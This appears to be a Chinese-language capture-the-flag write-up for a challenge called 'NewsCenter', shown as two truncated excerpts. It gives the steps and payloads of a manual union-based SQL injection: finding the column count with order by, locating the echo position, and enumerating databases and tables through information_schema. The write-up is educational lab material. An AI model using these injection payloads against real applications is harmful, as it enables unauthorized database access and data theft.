NewsCenter 打开题目是一个搜索框我们首先尝试一下sql注入 判断了一下是使用''进行包裹的字符型sql注入 然后我们需要判断数据库列数 1' order by 3# 回显正常但by4的时候回显就不正常了 所以判断数据库有三列 下面就是一些常规操作了,首先看看回显位 -1' union select 1,2,3# 写-1的原因是不要让正常数据影响到我们注入测出的结果 测试数据库 -1' union select 1,2,group_concat(schema_name) from inf…
手工注入 查询所有数据库名称和表名 ' union select 1,table_schema,table_name from information_schema.tables# 发现就两个数据库information_schema与news 查询news数据库中的表的名称 ' union select 1,table_schema,table_name from information_schema.tables where table_schema='news' # 查询secret_ta…